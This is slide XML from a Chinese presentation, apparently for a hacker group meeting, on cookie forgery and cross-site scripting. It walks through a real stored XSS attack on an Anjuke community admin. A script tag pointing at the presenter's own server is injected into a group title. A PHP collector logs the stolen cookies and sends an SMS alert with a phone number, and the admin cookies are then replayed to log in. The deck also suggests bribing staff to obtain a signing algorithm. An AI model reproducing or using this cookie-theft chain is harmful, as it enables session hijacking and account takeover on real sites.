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9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964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vip.wood-spring.com/sms/sms_api.php?code" TargetMode="External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bbscp.anjuke.com/group/verifyforum/list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ecocn.org/1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ecocn.org/1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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>欺骗与跨站的秘密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822600" y="2137680"/>
            <a:ext cx="841788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r"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-----</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>黑客小组第三次会议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大概流程</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25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Phpinfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>的内容如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>phpinfo();</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$data = $_GET['data'];</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$fp = fopen("1.txt","a");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>fwrite($fp,$data."\r\n");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>fclose($fp);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发一条短信给我手机</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>file_get_contents("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://vip.wood-spring.com/sms/sms_api.php?code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>=?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;phone=18221114203&amp;message=get%20some%20body");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?&gt;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大概流程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半个小时不到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>就收到信息了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>安居客的编辑效率很高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>!!!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>全部的关键数据如下</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>太多不好复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>截图如下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6360" y="2880000"/>
            <a:ext cx="4733640" cy="269532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大概流程</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30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打开火狐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie mgr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>然后将看样子是程序员写的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>全部换成他的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,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关键一步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>要修改一下 浏览器的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>useragent,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>可以用火狐的插件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>来修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>按照</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>得到的数据修改完成后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>访问得到的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://bbscp.anjuke.com/group/verifyforum/list/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>成功登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>截图留念</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: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3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640" y="3722400"/>
            <a:ext cx="6228360" cy="203760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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>原理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822600" y="2137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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>是保存在客户端的一段数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>每次浏览器和服务器交互</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>都会顺带着把这段数据</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发送给服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>因为这段数据保存在客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以我们可以将它任意修改</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>的常见用处</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>身份验证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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>身份验证流程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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>用户将帐号和密码提交给服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>服务器验证成功返回带有设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>协议头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>浏览器根据这些头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>修改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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>用户第二次浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>会将修改后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发送给服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>中是否有它设置的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>合法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>则判断用户是登录状态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3.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>是可以修改的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>服务器如何判断合法性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>常见的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>对用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>进行签名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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>签名认证方法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 sz="2200"/>
              <a:t>得到帐号密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>验证成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>会得到用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>然后对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>进行一个加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>且这个加密过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>是用户无法得到或者猜到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>一个变异的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>加密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 sz="2200"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id:456,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>然后 得到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>signature:md5(md5(456)+'Q3E4RB')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 sz="2200"/>
              <a:t>Q3E4RB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>是一个只有服务器知道的密钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>然后把这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>发给客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>客户端根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>协议头设置两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>cookie,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>然后下次提交数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>服务器获得这两个值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>并按照生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>的加密方式判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>的签名和传过来的签名是否相等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>来判断合法性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>.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 sz="2200"/>
              <a:t>因为我们只能修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>signature,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>但是我们如何得到一对这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>比如是管理员的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>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猜测</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822600" y="2137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第一种方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>我们能得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>服务器签名的算法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第二种方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>让管理员把他的这对值发送给我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关于第一种方法</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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如果某个网站是你知道的一个开源系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>那么你就可以得到它的算法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>但是有时候你得不到那个密钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以如果某个开源系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>没有能让站长自定义密钥的功能的话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>比如设置成一个固定值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>就比较危险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>!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爱房的验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>是采取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>useragent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>作为密钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以并不安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>只要稍微贿赂一下爱房的员工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>即可得到那个算法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关于第二种方法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如何让管理员主动把他的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发送给我们呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>?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那就要在管理员浏览某个页面的时候</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>可以执行我们指定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>将它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发送给我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所以我们需要跨站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如何跨站</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21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从一切可以向服务器提交数据的地方插手</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>安居客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>社区小组创建</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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请看操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>~~~~~~~~~~~~~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740880" y="699480"/>
            <a:ext cx="86076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大概流程</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930600" y="2101680"/>
            <a:ext cx="8417880" cy="476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l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>进入社区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>创建小组</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>小组标题和描述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>尝试输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;wqs&gt;,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>然后查看源码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>wqs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>并没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有被编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以而描述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>被编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以标题可以跨站</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>右边显示字符过多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>但是用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以用</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>火狐浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>禁用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>js,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>标题随便写一下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>但是为了让管理员查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>最好写的正式点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>发现有弹窗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以为了更加方便写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>js </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>所以将标题换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>房</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://ecocn.org/1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&gt;&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>中间的链接是我自己的服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
